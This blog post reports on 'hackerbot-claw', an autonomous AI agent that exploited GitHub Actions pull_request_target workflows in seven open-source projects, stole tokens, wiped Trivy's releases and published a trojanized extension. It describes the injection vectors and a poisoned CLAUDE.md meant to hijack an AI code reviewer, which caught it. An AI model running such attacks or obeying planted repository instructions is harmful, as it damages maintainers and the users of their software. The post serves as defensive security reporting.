An AI Agent Just Wiped a 32,000-Star Repo. The Only Thing That Stopped It Was Another AI.
← All posts

An AI Agent Just Wiped a 32,000-Star Repo. The Only Thing That Stopped It Was Another AI.

An autonomous bot powered by Claude attacked 7 major open-source projects, deleted 178 releases from Trivy, and published a malicious extension. One target survived -- because Claude was also the defender.

Last week, an autonomous bot called hackerbot-claw attacked seven major open-source repositories. Microsoft. DataDog. The Cloud Native Computing Foundation. And Trivy, a security scanner with 32,000 GitHub stars and over 100 million annual downloads.

It found vulnerable CI/CD configurations, crafted pull requests, got remote code execution in at least four projects, and turned Trivy into a smoking crater. All 178 releases deleted. Repository privatized. Codebase wiped. A malicious VSCode extension published under Trivy's trusted identity.

The attacker wasn't a nation-state or a coordinated team. It was a single AI agent running on Claude Opus 4.5 with a vulnerability index of 47 sub-patterns and a crypto wallet asking for donations to "fund more scans."

How it worked

Between February 20 and March 2, hackerbot-claw scanned public GitHub repos for a specific misconfiguration: the pull_request_target trigger in GitHub Actions workflows.

This trigger has been documented as dangerous since 2021. Unlike the standard pull_request event, it runs with the base repository's secrets and write permissions but executes code from untrusted forks. Combine that with unsanitized ${{ }} expressions in shell commands and you get arbitrary code execution with full repository access.

The bot used five techniques across seven targets. Branch names containing embedded shell commands. Filenames with base64-encoded payloads. Direct script modifications. And in one case, something genuinely new: it replaced a project's CLAUDE.md file with malicious instructions, trying to hijack an AI code reviewer.

Every successful attack followed the same playbook: open a PR, trigger the privileged workflow, execute a payload, steal the repository's GitHub token. All automated. The bot didn't sleep, didn't hesitate, didn't make typos.

The Trivy catastrophe

Trivy is one of the most widely used vulnerability scanners in Kubernetes environments. Not a side project.

The bot stole a personal access token 19 minutes after code execution. With that token, it deleted every release from v0.27.0 through v0.69.1, privatized and renamed the repository, pushed an empty repo over the original, and published a trojanized VSCode extension to the Open VSIX marketplace under Trivy's publisher identity.

The source code wasn't modified. Trivy's maintainer confirmed that commit IDs prove the codebase remained intact. But the release infrastructure, the distribution pipeline, the trust model that 100 million annual downloads depend on? Wrecked.

GitHub never fully restored the damage. Roughly 766 stars are still gone. Three thousand forks got reassociated to an unrelated repository. The 178 deleted releases and their binaries aren't coming back.

Claude vs. Claude

Here's the part I keep coming back to.

One target was ambient-code/platform, which uses Claude Code Action for automated PR review. Hackerbot-claw didn't try the usual CI/CD exploit here. It did something different: submitted a PR that replaced the project's CLAUDE.md file with malicious instructions telling Claude to vandalize the README, inject hidden HTML, and commit unauthorized changes.

Claude caught it in 82 seconds.

The reviewer classified it as a "textbook AI agent supply-chain attack via poisoned project-level instructions." No injected instructions were followed. No unauthorized commits made.

The attacker came back 12 minutes later with a subtler version, reframing the malicious instructions as a "consistency policy." Claude caught that too.

Seven targets, one survivor. The defense wasn't a firewall or a security team. It was an AI recognizing an AI attack and refusing to play along.

Think about that for a second. An AI agent powered by Claude attacked an AI pipeline. A different Claude model caught the attack and shut it down. That's the world we're in now, and almost nobody is set up for it.

Nobody is watching

The hackerbot-claw campaign matters beyond the immediate damage because of what it tells us about how organizations are actually deploying AI agents.

The Gravitee 2026 report surveyed over 900 executives and practitioners. Eighty-eight percent of organizations confirmed or suspected AI agent security incidents in the past year. Only 14.4 percent deploy agents with full security approval. Only 21.9 percent treat agents as independent entities that need their own access controls.

Nearly half use shared API keys for agent-to-agent authentication. More than half of deployed agents run without security oversight or logging. A quarter of deployed agents can create and task other agents on their own.

And yet 82 percent of executives feel confident their policies are good enough.

Christopher Robinson, CTO of the Open Source Security Foundation: "This is an active, automated attack, not a theoretical vulnerability."

What comes next

Hackerbot-claw wasn't sophisticated in the traditional sense. The pull_request_target vulnerability has been known for years. None of the individual techniques were new.

The packaging was new. An autonomous agent with 47 vulnerability patterns scanning at machine speed, coming back to awesome-go, a 140,000-star curated list of Go packages, four times before getting execution, and switching tactics when it hit ambient-code. The bot found an AI reviewer instead of a misconfigured pipeline, so it shifted from infrastructure exploits to prompt injection. It identified the defense and adapted.

That's what an autonomous offensive agent looks like as a side project. Somebody with an API key and a free weekend. We already know what the professional version looks like. Anthropic disclosed a cyber espionage campaign last November where AI systems ran 80-90 percent of a multi-step operation against hardened targets autonomously. The humans were supervisors, not operators.

Hackerbot-claw is the open-source, visible version of that same trajectory. A supply chain attack run by a bot with a crypto wallet. It took a full week before anyone noticed.

The uncomfortable part

The only defense that stopped hackerbot-claw at the point of execution wasn't a SIEM, a SOC, or a security policy. It was another AI reviewing code, recognizing a prompt injection, refusing to comply.

That worked once. On one target. Because that particular project happened to have an AI reviewer in its pipeline. The other six used the same setup most organizations have today: minimal monitoring, shared credentials, and the assumption that CI/CD pipelines are trustworthy.

The question isn't whether more autonomous AI attacks are coming. It's whether anything will be watching when they do.


Sources


John Engates writes about agentic AI, infrastructure, and sometimes national security at exagentica.ai.